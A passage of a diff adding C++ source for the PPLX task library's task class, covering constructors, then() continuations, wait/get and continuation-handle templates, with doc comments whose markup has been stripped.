_CreateImpl(_TaskOptions.get_cancellation_token()._GetImplValue(), _TaskOptions.get_scheduler()); + // Do not move the next line out of this function. It is important that PPLX_CAPTURE_CALLSTACK() evaluate to the + // the call site of the task constructor. + _SetTaskCreationCallstack(details::_get_internal_task_options(_TaskOptions)._M_hasPresetCreationCallstack + ? details::_get_internal_task_options(_TaskOptions)._M_presetCreationCallstack + : PPLX_CAPTURE_CALLSTACK()); + + _TaskInitMaybeFunctor(_Param, details::_IsCallable(_Param, 0)); + } + + /// + /// Constructs a task object. + /// + /// + /// The source task object. + /// + /// + /// The default constructor for a task is only present in order to allow tasks to be used within + /// containers. A default constructed task cannot be used until you assign a valid task to it. Methods such as + /// get, wait or then will throw an invalid_argument exception when called on a default constructed task. A task that is + /// created from a task_completion_event will complete (and have its continuations scheduled) when the + /// task completion event is set. The version of the constructor that takes a cancellation token + /// creates a task that can be canceled using the cancellation_token_source the token was obtained from. + /// Tasks created without a cancellation token are not cancelable. Tasks created from a + /// Windows::Foundation::IAsyncInfo interface or a lambda that returns an IAsyncInfo interface + /// reach their terminal state when the enclosed Windows Runtime asynchronous operation or action completes. + /// Similarly, tasks created from a lambda that returns a task<result_type> reach their terminal + /// state when the inner task reaches its terminal state, and not when the lambda returns. + /// task behaves like a smart pointer and is safe to pass around by value. It can be accessed by + /// multiple threads without the need for locks. The constructor overloads that take a + /// Windows::Foundation::IAsyncInfo interface or a lambda returning such an interface, are only available to + /// Windows Store apps. For more information, see . + /// + /**/ + task(const task& _Other) : _M_Impl(_Other._M_Impl) {} + + /// + /// Constructs a task object. + /// + /// + /// The source task object. + /// + /// + /// The default constructor for a task is only present in order to allow tasks to be used within + /// containers. A default constructed task cannot be used until you assign a valid task to it. Methods such as + /// get, wait or then will throw an invalid_argument exception when called on a default constructed task. A task that is + /// created from a task_completion_event will complete (and have its continuations scheduled) when the + /// task completion event is set. The version of the constructor that takes a cancellation token + /// creates a task that can be canceled using the cancellation_token_source the token was obtained from. + /// Tasks created without a cancellation token are not cancelable. Tasks created from a + /// Windows::Foundation::IAsyncInfo interface or a lambda that returns an IAsyncInfo interface + /// reach their terminal state when the enclosed Windows Runtime asynchronous operation or action completes. + /// Similarly, tasks created from a lambda that returns a task<result_type> reach their terminal + /// state when the inner task reaches its terminal state, and not when the lambda returns. + /// task behaves like a smart pointer and is safe to pass around by value. It can be accessed by + /// multiple threads without the need for locks. The constructor overloads that take a + /// Windows::Foundation::IAsyncInfo interface or a lambda returning such an interface, are only available to + /// Windows Store apps. For more information, see . + /// + /**/ + task(task&& _Other) : _M_Impl(std::move(_Other._M_Impl)) {} + + /// + /// Replaces the contents of one task object with another. + /// + /// + /// The source task object. + /// + /// + /// As task behaves like a smart pointer, after a copy assignment, this task objects represents + /// the same actual task as does. + /// + /**/ + task& operator=(const task& _Other) + { + if (this != &_Other) + { + _M_Impl = _Other._M_Impl; + } + return *this; + } + + /// + /// Replaces the contents of one task object with another. + /// + /// + /// The source task object. + /// + /// + /// As task behaves like a smart pointer, after a copy assignment, this task objects represents + /// the same actual task as does. + /// + /**/ + task& operator=(task&& _Other) + { + if (this != &_Other) + { + _M_Impl = std::move(_Other._M_Impl); + } + return *this; + } + + /// + /// Adds a continuation task to this task. + /// + /// + /// The type of the function object that will be invoked by this task. + /// + /// + /// The continuation function to execute when this task completes. This continuation function must take as input + /// a variable of either result_type or task<result_type>, where result_type is the + /// type of the result this task produces. + /// + /// + /// The newly created continuation task. The result type of the returned task is determined by what returns. + /// + /// + /// The overloads of then that take a lambda or functor that returns a Windows::Foundation::IAsyncInfo + /// interface, are only available to Windows Store apps. For more information on how to use task + /// continuations to compose asynchronous work, see . + /// + /**/ + template + __declspec(noinline) // Ask for no inlining so that the PPLX_CAPTURE_CALLSTACK gives us the expected result + auto then(_Function&& _Func) const -> + typename details::_ContinuationTypeTraits<_Function, _ReturnType>::_TaskOfType + { + task_options _TaskOptions; + details::_get_internal_task_options(_TaskOptions)._set_creation_callstack(PPLX_CAPTURE_CALLSTACK()); + return _ThenImpl<_ReturnType, _Function>(std::forward<_Function>(_Func), _TaskOptions); + } + + /// + /// Adds a continuation task to this task. + /// + /// + /// The type of the function object that will be invoked by this task. + /// + /// + /// The continuation function to execute when this task completes. This continuation function must take as input + /// a variable of either result_type or task<result_type>, where result_type is the + /// type of the result this task produces. + /// + /// + /// The task options include cancellation token, scheduler and continuation context. By default the former 3 + /// options are inherited from the antecedent task + /// + /// + /// The newly created continuation task. The result type of the returned task is determined by what returns. + /// + /// + /// The overloads of then that take a lambda or functor that returns a Windows::Foundation::IAsyncInfo + /// interface, are only available to Windows Store apps. For more information on how to use task + /// continuations to compose asynchronous work, see . + /// + /**/ + template + __declspec(noinline) // Ask for no inlining so that the PPLX_CAPTURE_CALLSTACK gives us the expected result + auto then(_Function&& _Func, task_options _TaskOptions) const -> + typename details::_ContinuationTypeTraits<_Function, _ReturnType>::_TaskOfType + { + details::_get_internal_task_options(_TaskOptions)._set_creation_callstack(PPLX_CAPTURE_CALLSTACK()); + return _ThenImpl<_ReturnType, _Function>(std::forward<_Function>(_Func), _TaskOptions); + } + + /// + /// Adds a continuation task to this task. + /// + /// + /// The type of the function object that will be invoked by this task. + /// + /// + /// The continuation function to execute when this task completes. This continuation function must take as input + /// a variable of either result_type or task<result_type>, where result_type is the + /// type of the result this task produces. + /// + /// + /// The cancellation token to associate with the continuation task. A continuation task that is created without + /// a cancellation token will inherit the token of its antecedent task. + /// + /// + /// A variable that specifies where the continuation should execute. This variable is only useful when used in a + /// Windows Store style app. For more information, see task_continuation_context + /// + /// + /// The newly created continuation task. The result type of the returned task is determined by what returns. + /// + /// + /// The overloads of then that take a lambda or functor that returns a Windows::Foundation::IAsyncInfo + /// interface, are only available to Windows Store apps. For more information on how to use task + /// continuations to compose asynchronous work, see . + /// + /**/ + template + __declspec(noinline) // Ask for no inlining so that the PPLX_CAPTURE_CALLSTACK gives us the expected result + auto then(_Function&& _Func, + cancellation_token _CancellationToken, + task_continuation_context _ContinuationContext) const -> + typename details::_ContinuationTypeTraits<_Function, _ReturnType>::_TaskOfType + { + task_options _TaskOptions(_CancellationToken, _ContinuationContext); + details::_get_internal_task_options(_TaskOptions)._set_creation_callstack(PPLX_CAPTURE_CALLSTACK()); + return _ThenImpl<_ReturnType, _Function>(std::forward<_Function>(_Func), _TaskOptions); + } + + /// + /// Waits for this task to reach a terminal state. It is possible for wait to execute the task inline, if + /// all of the tasks dependencies are satisfied, and it has not already been picked up for execution by a + /// background worker. + /// + /// + /// A task_status value which could be either completed or canceled. If the task + /// encountered an exception during execution, or an exception was propagated to it from an antecedent task, + /// wait will throw that exception. + /// + /**/ + task_status wait() const + { + if (!_M_Impl) + { + throw invalid_operation("wait() cannot be called on a default constructed task."); + } + + return _M_Impl->_Wait(); + } + + /// + /// Returns the result this task produced. If the task is not in a terminal state, a call to get will + /// wait for the task to finish. This method does not return a value when called on a task with a + /// result_type of void. + /// + /// + /// The result of the task. + /// + /// + /// If the task is canceled, a call to get will throw a task_canceled exception. If the task encountered an different exception or an exception was + /// propagated to it from an antecedent task, a call to get will throw that exception. + /// + /**/ + _ReturnType get() const + { + if (!_M_Impl) + { + throw invalid_operation("get() cannot be called on a default constructed task."); + } + + if (_M_Impl->_Wait() == canceled) + { + throw task_canceled(); + } + + return _M_Impl->_GetResult(); + } + + /// + /// Determines if the task is completed. + /// + /// + /// True if the task has completed, false otherwise. + /// + /// + /// The function returns true if the task is completed or canceled (with or without user exception). + /// + bool is_done() const + { + if (!_M_Impl) + { + throw invalid_operation("is_done() cannot be called on a default constructed task."); + } + + return _M_Impl->_IsDone(); + } + + /// + /// Returns the scheduler for this task + /// + /// + /// A pointer to the scheduler + /// + scheduler_ptr scheduler() const + { + if (!_M_Impl) + { + throw invalid_operation("scheduler() cannot be called on a default constructed task."); + } + + return _M_Impl->_GetScheduler(); + } + + /// + /// Determines whether the task unwraps a Windows Runtime IAsyncInfo interface or is descended from such + /// a task. + /// + /// + /// true if the task unwraps an IAsyncInfo interface or is descended from such a task, + /// false otherwise. + /// + /**/ + bool is_apartment_aware() const + { + if (!_M_Impl) + { + throw invalid_operation("is_apartment_aware() cannot be called on a default constructed task."); + } + return _M_Impl->_IsApartmentAware(); + } + + /// + /// Determines whether two task objects represent the same internal task. + /// + /// + /// true if the objects refer to the same underlying task, and false otherwise. + /// + /**/ + bool operator==(const task<_ReturnType>& _Rhs) const { return (_M_Impl == _Rhs._M_Impl); } + + /// + /// Determines whether two task objects represent different internal tasks. + /// + /// + /// true if the objects refer to different underlying tasks, and false otherwise. + /// + /**/ + bool operator!=(const task<_ReturnType>& _Rhs) const { return !operator==(_Rhs); } + + /// + /// Create an underlying task implementation. + /// + void _CreateImpl(details::_CancellationTokenState* _Ct, scheduler_ptr _Scheduler) + { + _ASSERTE(_Ct != nullptr); + _M_Impl = details::_Task_ptr<_ReturnType>::_Make(_Ct, _Scheduler); + if (_Ct != details::_CancellationTokenState::_None()) + { + _M_Impl->_RegisterCancellation(_M_Impl); + } + } + + /// + /// Return the underlying implementation for this task. + /// + const typename details::_Task_ptr<_ReturnType>::_Type& _GetImpl() const { return _M_Impl; } + + /// + /// Set the implementation of the task to be the supplied implementation. + /// + void _SetImpl(const typename details::_Task_ptr<_ReturnType>::_Type& _Impl) + { + _ASSERTE(!_M_Impl); + _M_Impl = _Impl; + } + + /// + /// Set the implementation of the task to be the supplied implementation using a move instead of a copy. + /// + void _SetImpl(typename details::_Task_ptr<_ReturnType>::_Type&& _Impl) + { + _ASSERTE(!_M_Impl); + _M_Impl = std::move(_Impl); + } + + /// + /// Sets a property determining whether the task is apartment aware. + /// + void _SetAsync(bool _Async = true) { _GetImpl()->_SetAsync(_Async); } + + /// + /// Sets a field in the task impl to the return callstack for calls to the task constructors and the then + /// method. + /// + void _SetTaskCreationCallstack(const details::_TaskCreationCallstack& _callstack) + { + _GetImpl()->_SetTaskCreationCallstack(_callstack); + } + + /// + /// An internal version of then that takes additional flags and always execute the continuation inline by + /// default. When _ForceInline is set to false, continuations inlining will be limited to default + /// _DefaultAutoInline. This function is Used for runtime internal continuations only. + /// + template + auto _Then(_Function&& _Func, + details::_CancellationTokenState* _PTokenState, + details::_TaskInliningMode_t _InliningMode = details::_ForceInline) const -> + typename details::_ContinuationTypeTraits<_Function, _ReturnType>::_TaskOfType + { + // inherit from antecedent + auto _Scheduler = _GetImpl()->_GetScheduler(); + + return _ThenImpl<_ReturnType, _Function>(std::forward<_Function>(_Func), + _PTokenState, + task_continuation_context::use_default(), + _Scheduler, + PPLX_CAPTURE_CALLSTACK(), + _InliningMode); + } + +private: + template + friend class task; + + // The task handle type used to construct an 'initial task' - a task with no dependents. + template + struct _InitialTaskHandle + : details::_PPLTaskHandle<_ReturnType, + _InitialTaskHandle<_InternalReturnType, _Function, _TypeSelection>, + details::_UnrealizedChore_t> + { + _Function _M_function; + _InitialTaskHandle(const typename details::_Task_ptr<_ReturnType>::_Type& _TaskImpl, const _Function& _func) + : details::_PPLTaskHandle<_ReturnType, + _InitialTaskHandle<_InternalReturnType, _Function, _TypeSelection>, + details::_UnrealizedChore_t>::_PPLTaskHandle(_TaskImpl) + , _M_function(_func) + { + } + + virtual ~_InitialTaskHandle() {} + + template + auto _LogWorkItemAndInvokeUserLambda(_Func&& _func) const -> decltype(_func()) + { + details::_TaskWorkItemRAIILogger _LogWorkItem(this->_M_pTask->_M_taskEventLogger); + CASABLANCA_UNREFERENCED_PARAMETER(_LogWorkItem); + return _func(); + } + + void _Perform() const { _Init(_TypeSelection()); } + + void _SyncCancelAndPropagateException() const { this->_M_pTask->_Cancel(true); } + + // + // Overload 0: returns _InternalReturnType + // + // This is the most basic task with no unwrapping + // + void _Init(details::_TypeSelectorNoAsync) const + { + this->_M_pTask->_FinalizeAndRunContinuations( + _LogWorkItemAndInvokeUserLambda(_Init_func_transformer<_InternalReturnType>::_Perform(_M_function))); + } + + // + // Overload 1: returns IAsyncOperation<_InternalReturnType>^ (only under /ZW) + // or + // returns task<_InternalReturnType> + // + // This is task whose functor returns an async operation or a task which will be unwrapped for continuation + // Depending on the output type, the right _AsyncInit gets invoked + // + void _Init(details::_TypeSelectorAsyncOperationOrTask) const + { + details::_Task_impl_base::_AsyncInit<_ReturnType, _InternalReturnType>( + this->_M_pTask, _LogWorkItemAndInvokeUserLambda(_M_function)); + } + +#if defined(__cplusplus_winrt) + // + // Overload 2: returns IAsyncAction^ + // + // This is task whose functor returns an async action which will be unwrapped for continuation + // + void _Init(details::_TypeSelectorAsyncAction) const + { + details::_Task_impl_base::_AsyncInit<_ReturnType, _InternalReturnType>( + this->_M_pTask, + ref new details::_IAsyncActionToAsyncOperationConverter(_LogWorkItemAndInvokeUserLambda(_M_function))); + } + + // + // Overload 3: returns IAsyncOperationWithProgress<_InternalReturnType, _ProgressType>^ + // + // This is task whose functor returns an async operation with progress which will be unwrapped for continuation + // + void _Init(details::_TypeSelectorAsyncOperationWithProgress) const + { + typedef details::_GetProgressType::_Value _ProgressType; + + details::_Task_impl_base::_AsyncInit<_ReturnType, _InternalReturnType>( + this->_M_pTask, + ref new details::_IAsyncOperationWithProgressToAsyncOperationConverter<_InternalReturnType, + _ProgressType>( + _LogWorkItemAndInvokeUserLambda(_M_function))); + } + + // + // Overload 4: returns IAsyncActionWithProgress<_ProgressType>^ + // + // This is task whose functor returns an async action with progress which will be unwrapped for continuation + // + void _Init(details::_TypeSelectorAsyncActionWithProgress) const + { + typedef details::_GetProgressType::_Value _ProgressType; + + details::_Task_impl_base::_AsyncInit<_ReturnType, _InternalReturnType>( + this->_M_pTask, + ref new details::_IAsyncActionWithProgressToAsyncOperationConverter<_ProgressType>( + _LogWorkItemAndInvokeUserLambda(_M_function))); + } +#endif /* defined (__cplusplus_winrt) */ + }; + + /// + /// The task handle type used to create a 'continuation task'. + /// + template + struct _ContinuationTaskHandle + : details::_PPLTaskHandle::_Type, + _ContinuationTaskHandle<_InternalReturnType, + _ContinuationReturnType, + _Function, + _IsTaskBased, + _TypeSelection>, + details::_ContinuationTaskHandleBase> + { + typedef typename details::_NormalizeVoidToUnitType<_ContinuationReturnType>::_Type + _NormalizedContinuationReturnType; + + typename details::_Task_ptr<_ReturnType>::_Type _M_ancestorTaskImpl; + typename details::_CopyableFunctor::type>::_Type _M_function; + + template + _ContinuationTaskHandle( + const typename details::_Task_ptr<_ReturnType>::_Type& _AncestorImpl, + const typename details::_Task_ptr<_NormalizedContinuationReturnType>::_Type& _ContinuationImpl, + _ForwardedFunction&& _Func, + const task_continuation_context& _Context, + details::_TaskInliningMode_t _InliningMode) + : details::_PPLTaskHandle::_Type, + _ContinuationTaskHandle<_InternalReturnType, + _ContinuationReturnType, + _Function, + _IsTaskBased, + _TypeSelection>, + details::_ContinuationTaskHandleBase>::_PPLTaskHandle(_ContinuationImpl) + , _M_ancestorTaskImpl(_AncestorImpl) + , _M_function(std::forward<_ForwardedFunction>(_Func)) + { + this->_M_isTaskBasedContinuation = _IsTaskBased::value; + this->_M_continuationContext = _Context; + this->_M_continuationContext._Resolve(_AncestorImpl->_IsApartmentAware()); + this->_M_inliningMode = _InliningMode; + } + + virtual ~_ContinuationTaskHandle() {} + + template + auto _LogWorkItemAndInvokeUserLambda(_Func&& _func, _Arg&& _value) const + -> decltype(_func(std::forward<_Arg>(_value))) + { + details::_TaskWorkItemRAIILogger _LogWorkItem(this->_M_pTask->_M_taskEventLogger); + CASABLANCA_UNREFERENCED_PARAMETER(_LogWorkItem); + return _func(std::forward<_Arg>(_value)); + } + + void _Perform() const { _Continue(_IsTaskBased(), _TypeSelection()); } + + void _SyncCancelAndPropagateException() const + { + if (_M_ancestorTaskImpl->_HasUserException()) + { + // If the ancestor encountered an exception, transfer the exception to the continuation + // This traverses down the tree to propagate the exception. + this->_M_pTask->_CancelWithExceptionHolder(_M_ancestorTaskImpl->_GetExceptionHolder(), true); + } + else + { + // If the ancestor was canceled, then your own execution should be canceled. + // This traverses down the tree to cancel it. + this->_M_pTask->_Cancel(true); + } + } + + // + // Overload 0-0: _InternalReturnType -> _TaskType + // + // This is a straight task continuation which simply invokes its target with the ancestor's completion argument + // + void _Continue(std::false_type, details::_TypeSelectorNoAsync) const + { + this->_M_pTask->_FinalizeAndRunContinuations(_LogWorkItemAndInvokeUserLambda( + _Continuation_func_transformer<_InternalReturnType, _ContinuationReturnType>::_Perform(_M_function), + _M_ancestorTaskImpl->_GetResult())); + } + + // + // Overload 0-1: _InternalReturnType -> IAsyncOperation<_TaskType>^ (only under /ZW) + // or + // _InternalReturnType -> task<_TaskType> + // + // This is a straight task continuation which returns an async operation or a task which will be unwrapped for + // continuation Depending on the output type, the right _AsyncInit gets invoked + // + void _Continue(std::false_type, details::_TypeSelectorAsyncOperationOrTask) const + { + typedef typename details::_FunctionTypeTraits<_Function, _InternalReturnType>::_FuncRetType _FuncOutputType; + + details::_Task_impl_base::_AsyncInit<_NormalizedContinuationReturnType, _ContinuationReturnType>( + this->_M_pTask, + _LogWorkItemAndInvokeUserLambda( + _Continuation_func_transformer<_InternalReturnType, _FuncOutputType>::_Perform(_M_function), + _M_ancestorTaskImpl->_GetResult())); + } + +#if defined(__cplusplus_winrt) + // + // Overload 0-2: _InternalReturnType -> IAsyncAction^ + // + // This is a straight task continuation which returns an async action which will be unwrapped for continuation + // + void _Continue(std::false_type, details::_TypeSelectorAsyncAction) const + { + typedef details::_FunctionTypeTraits<_Function, _InternalReturnType>::_FuncRetType _FuncOutputType; + + details::_Task_impl_base::_AsyncInit<_NormalizedContinuationReturnType, _ContinuationReturnType>( + this->_M_pTask, + ref new details::_IAsyncActionToAsyncOperationConverter(_LogWorkItemAndInvokeUserLambda( + _Continuation_func_transformer<_InternalReturnType, _FuncOutputType>::_Perform(_M_function), + _M_ancestorTaskImpl->_GetResult()))); + } + + // + // Overload 0-3: _InternalReturnType -> IAsyncOperationWithProgress<_TaskType, _ProgressType>^ + // + // This is a straight task continuation which returns an async operation with progress which will be unwrapped + // for continuation + // + void _Continue(std::false_type, details::_TypeSelectorAsyncOperationWithProgress) const + { + typedef details::_FunctionTypeTraits<_Function, _InternalReturnType>::_FuncRetType _FuncOutputType; + + auto _OpWithProgress = _LogWorkItemAndInvokeUserLambda( + _Continuation_func_transformer<_InternalReturnType, _FuncOutputType>::_Perform(_M_function), + _M_ancestorTaskImpl->_GetResult()); + typedef details::_GetProgressType::_Value _ProgressType; + + details::_Task_impl_base::_AsyncInit<_NormalizedContinuationReturnType, _ContinuationReturnType>( + this->_M_pTask, + ref new details::_IAsyncOperationWithProgressToAsyncOperationConverter<_ContinuationReturnType, + _ProgressType>(_OpWithProgress)); + } + + // + // Overload 0-4: _InternalReturnType -> IAsyncActionWithProgress<_ProgressType>^ + // + // This is a straight task continuation which returns an async action with progress which will be unwrapped for + // continuation + // + void _Continue(std::false_type, details::_TypeSelectorAsyncActionWithProgress) const + { + typedef details::_FunctionTypeTraits<_Function, _InternalReturnType>::_FuncRetType _FuncOutputType; + + auto _OpWithProgress = _LogWorkItemAndInvokeUserLambda( + _Continuation_func_transformer<_InternalReturnType, _FuncOutputType>::_Perform(_M_function), + _M_ancestorTaskImpl->_GetResult()); + typedef details::_GetProgressType::_Value _ProgressType; + + details::_Task_impl_base::_AsyncInit<_NormalizedContinuationReturnType, _ContinuationReturnType>( + this->_M_pTask, + ref new details::_IAsyncActionWithProgressToAsyncOperationConverter<_ProgressType>(_OpWithProgress)); + } + +#endif /* defined (__cplusplus_winrt) */ + + // + // Overload 1-0: task<_InternalReturnType> -> _TaskType + // + // This is an exception handling type of continuation which takes the task rather than the task's result. + // + void _Continue(std::true_type, details::_TypeSelectorNoAsync) const + { + typedef task<_InternalReturnType> _FuncInputType; + task<_InternalReturnType> _ResultTask; + _ResultTask._SetImpl(std::move(_M_ancestorTaskImpl)); + this->_M_pTask->_FinalizeAndRunContinuations(_LogWorkItemAndInvokeUserLambda( + _Continuation_func_transformer<_FuncInputType, _ContinuationReturnType>::_Perform(_M_function), + std::move(_ResultTask))); + } + + // + // Overload 1-1: task<_InternalReturnType> -> IAsyncOperation<_TaskType>^ + // or + // task<_TaskType> + // + // This is an exception handling type of continuation which takes the task rather than + // the task's result. It also returns an async operation or a task which will be unwrapped + // for continuation + // + void _Continue(std::true_type, details::_TypeSelectorAsyncOperationOrTask) const + { + // The continuation takes a parameter of type task<_Input>, which is the same as the ancestor task. + task<_InternalReturnType> _ResultTask; + _ResultTask._SetImpl(std::move(_M_ancestorTaskImpl)); + details::_Task_impl_base::_AsyncInit<_NormalizedContinuationReturnType, _ContinuationReturnType>( + this->_M_pTask, _LogWorkItemAndInvokeUserLambda(_M_function, std::move(_ResultTask))); + } + +#if defined(__cplusplus_winrt) + + // + // Overload 1-2: task<_InternalReturnType> -> IAsyncAction^ + // + // This is an exception handling type of continuation which takes the task rather than + // the task's result. It also returns an async action which will be unwrapped for continuation + // + void _Continue(std::true_type, details::_TypeSelectorAsyncAction) const + { + // The continuation takes a parameter of type task<_Input>, which is the same as the ancestor task. + task<_InternalReturnType> _ResultTask; + _ResultTask._SetImpl(std::move(_M_ancestorTaskImpl)); + details::_Task_impl_base::_AsyncInit<_NormalizedContinuationReturnType, _ContinuationReturnType>( + this->_M_pTask, + ref new details::_IAsyncActionToAsyncOperationConverter( + _LogWorkItemAndInvokeUserLambda(_M_function, std::move(_ResultTask)))); + } + + // + // Overload 1-3: task<_InternalReturnType> -> IAsyncOperationWithProgress<_TaskType, _ProgressType>^ + // + // This is an exception handling type of continuation which takes the task rather than + // the task's result. It also returns an async operation with progress which will be unwrapped + // for continuation + // + void _Continue(std::true_type, details::_TypeSelectorAsyncOperationWithProgress) const + { + // The continuation takes a parameter of type task<_Input>, which is the same as the ancestor task. + task<_InternalReturnType> _ResultTask; + _ResultTask._SetImpl(std::move(_M_ancestorTaskImpl)); + + typedef details::_GetProgressType::_Value _ProgressType; + + details::_Task_impl_base::_AsyncInit<_NormalizedContinuationReturnType, _ContinuationReturnType>( + this->_M_pTask, + ref new details::_IAsyncOperationWithProgressToAsyncOperationConverter<_ContinuationReturnType, + _ProgressType>( + _LogWorkItemAndInvokeUserLambda(_M_function, std::move(_ResultTask)))); + } + + // + // Overload 1-4: task<_InternalReturnType> -> IAsyncActionWithProgress<_ProgressType>^ + // + // This is an exception handling type of continuation which takes the task rather than + // the task's result. It also returns an async operation with progress which will be unwrapped + // for continuation + // + void _Continue(std::true_type, details::_TypeSelectorAsyncActionWithProgress) const + { + // The continuation takes a parameter of type task<_Input>, which is the same as the ancestor task. + task<_InternalReturnType> _ResultTask; + _ResultTask._SetImpl(std::move(_M_ancestorTaskImpl)); + + typedef details::_GetProgressType::_Value _ProgressType; + + details::_Task_impl_base::_AsyncInit<_NormalizedContinuationReturnType, _ContinuationReturnType>( + this->_M_pTask, + ref new details::_IAsyncActionWithProgressToAsyncOperationConverter<_ProgressType>( + _LogWorkItemAndInvokeUserLambda(_M_function, std::move(_ResultTask)))); + } +#endif /* defined (__cplusplus_winrt) */ + }; + + /// + /// Initializes a task using a lambda, function pointer or function object. + /// + template + void _TaskInitWithFunctor(const _Function& _Func) + { + typedef typename details::_InitFunctorTypeTraits<_InternalReturnType, decltype(_Func())> _Async_type_traits; + + _M_Impl->_M_fFromAsync = _Async_type_traits::_IsAsyncTask; + _M_Impl->_M_fUnwrappedTask = _Async_type_traits::_IsUnwrappedTaskOrAsync; + _M_Impl->_M_taskEventLogger._LogScheduleTask(false); + _M_Impl->_ScheduleTask( + new _InitialTaskHandle<_InternalReturnType, _Function, typename _Async_type_traits::_AsyncKind>(_GetImpl(), + _Func), + details::_NoInline); + } + + /// + /// Initializes a task using a task completion event. + /// + void _TaskInitNoFunctor(task_completion_event<_ReturnType>& _Event) { _Event._RegisterTask(_M_Impl); } + +#if defined(__cplusplus_winrt) + /// + /// Initializes a task using an asynchronous operation IAsyncOperation^ + /// + void _TaskInitAsyncOp( + Windows::Foundation::IAsyncOperation::_Value> ^ _AsyncOp) + { + _M_Impl->_M_fFromAsync = true; + + // Mark this task as started here since we can set the state in the constructor without acquiring a lock. Once + // _AsyncInit returns a completion could execute concurrently and the task must be fully initialized before that + // happens. + _M_Impl->_M_TaskState = details::_Task_impl_base::_Started; + // Pass the shared pointer into _AsyncInit for storage in the Async Callback. + details::_Task_impl_base::_AsyncInit<_ReturnType, _ReturnType>(_M_Impl, _AsyncOp); + } + + /// + /// Initializes a task using an asynchronous operation IAsyncOperation^ + /// + void _TaskInitNoFunctor( + Windows::Foundation::IAsyncOperation::_Value> ^ _AsyncOp) + { + _TaskInitAsyncOp(_AsyncOp); + } + + /// + /// Initializes a task using an asynchronous operation with progress IAsyncOperationWithProgress^ + /// + template + void _TaskInitNoFunctor( + Windows::Foundation::IAsyncOperationWithProgress::_Value, + _Progress> ^ + _AsyncOp) + { + _TaskInitAsyncOp(ref new details::_IAsyncOperationWithProgressToAsyncOperationConverter< + typename details::_ValueTypeOrRefType<_ReturnType>::_Value, + _Progress>(_AsyncOp)); + } +#endif /* defined (__cplusplus_winrt) */ + + /// + /// Initializes a task using a callable object. + /// + template + void _TaskInitMaybeFunctor(_Function& _Func, std::true_type) + { + _TaskInitWithFunctor<_ReturnType, _Function>(_Func); + } + + /// + /// Initializes a task using a non-callable object. + /// + template + void _TaskInitMaybeFunctor(_Ty& _Param, std::false_type) + { + _TaskInitNoFunctor(_Param); + } + + template + auto _ThenImpl(_Function&& _Func, const task_options& _TaskOptions) const -> + typename details::_ContinuationTypeTraits<_Function, _InternalReturnType>::_TaskOfType + { + if (!_M_Impl) + { + throw invalid_operation("then() cannot be called on a default constructed task."); + } + + details::_CancellationTokenState* _PTokenState = + _TaskOptions.has_cancellation_token() ? _TaskOptions.get_cancellation_token()._GetImplValue() : nullptr; + auto _Scheduler = _TaskOptions.has_scheduler() ? _TaskOptions.get_scheduler() : _GetImpl()->_GetScheduler(); + auto _CreationStack = details::_get_internal_task_options(_TaskOptions)._M_hasPresetCreationCallstack + ? details::_get_internal_task_options(_TaskOptions)._M_presetCreationCallstack + : details::_TaskCreationCallstack(); + return _ThenImpl<_InternalReturnType, _Function>(std::forward<_Function>(_Func), + _PTokenState, + _TaskOptions.get_continuation_context(), + _Scheduler, + _CreationStack); + } + + /// + /// The one and only implementation of then for void and non-void tasks. + /// + template + auto _ThenImpl(_Function&& _Func, + details::_CancellationTokenState* _PTokenState, + const task_continuation_context& _ContinuationContext, + scheduler_ptr _Scheduler, + details::_TaskCreationCallstack _CreationStack, + details::_TaskInliningMode_t _InliningMode = details::_NoInline) const -> + typename details::_ContinuationTypeTraits<_Function, _InternalReturnType>::_TaskOfType + { + if (!_M_Impl) + { + throw invalid_operation("then() cannot be called on a default constructed task."); + } + + typedef details::_FunctionTypeTraits<_Function, _InternalReturnType> _Function_type_traits; + typedef details::_TaskTypeTraits _Async_type_traits; + typedef typename _Async_type_traits::_TaskRetType _TaskType; + + // + // A **nullptr** token state indicates that it was not provided by the user. In this case, we inherit the + // antecedent's token UNLESS this is a an exception handling continuation. In that case, we break the chain with + // a _None. That continuation is never canceled unless the user explicitly passes the same token. + // + if (_PTokenState == nullptr) + { + if (_Function_type_traits::_Takes_task::value) + { + _PTokenState = details::_CancellationTokenState::_None(); + } + else + { + _PTokenState = _GetImpl()->_M_pTokenState; + } + } + + task<_TaskType> _ContinuationTask; + _ContinuationTask._CreateImpl(_PTokenState, _Scheduler); + + _ContinuationTask._GetImpl()->_M_fFromAsync = (_GetImpl()->_M_fFromAsync || _Async_type_traits::_IsAsyncTask); + _ContinuationTask._GetImpl()->_M_fUnwrappedTask = _Async_type_traits::_IsUnwrappedTaskOrAsync; + _ContinuationTask._SetTaskCreationCallstack(_CreationStack); + + _GetImpl()->_ScheduleContinuation( + new _ContinuationTaskHandle<_InternalReturnType, + _TaskType, + _Function, + typename _Function_type_traits::_Takes_task, + typename _Async_type_traits::_AsyncKind>(_GetImpl(), + _ContinuationTask._GetImpl(), + std::forward<_Function>(_Func), + _ContinuationContext, + _InliningMode)); + + return _ContinuationTask; + } + + // The underlying implementation for this task + typename details::_Task_ptr<_ReturnType>::_Type _M_Impl; +}; + +/// +/// The Parallel Patterns Library (PPL) task class. A task object represents work that can be executed +/// asynchronously, and concurrently with other tasks and parallel work produced by parallel algorithms in the +/// Concurrency Runtime. It produces a result of type on successful completion. +/// Tasks of type task<void> produce no result. A task can be waited upon and canceled independently of +/// other tasks. It can also be composed with other tasks using continuations(then), and +/// join(when_all) and choice(when_any) patterns. +/// +/// +/// For more information, see . +/// +/**/ +template<> +class task +{ +public: + /// + /// The type of the result an object of this class produces. + /// + /**/ + typedef void result_type; + + /// + /// Constructs a task object. + /// + /// + /// The default constructor for a task is only present in order to allow tasks to be used within + /// containers. A default constructed task cannot be used until you assign a valid task to it. Methods such as + /// get, wait or then will throw an invalid_argument exception when called on a default constructed task. A task that is + /// created from a task_completion_event will complete (and have its continuations scheduled) when the + /// task completion event is set. The version of the constructor that takes a cancellation token + /// creates a task that can be canceled using the cancellation_token_source the token was obtained from. + /// Tasks created without a cancellation token are not cancelable. Tasks created from a + /// Windows::Foundation::IAsyncInfo interface or a lambda that returns an IAsyncInfo interface + /// reach their terminal state when the enclosed Windows Runtime asynchronous operation or action completes. + /// Similarly, tasks created from a lambda that returns a task<result_type> reach their terminal + /// state when the inner task reaches its terminal state, and not when the lambda returns. + /// task behaves like a smart pointer and is safe to pass around by value. It can be accessed by + /// multiple threads without the need for locks. The constructor overloads that take a + /// Windows::Foundation::IAsyncInfo interface or a lambda returning such an interface, are only available to + /// Windows Store apps. For more information, see . + /// + /**/ + task() : _M_unitTask() + { + // The default constructor should create a task with a nullptr impl. This is a signal that the + // task is not usable and 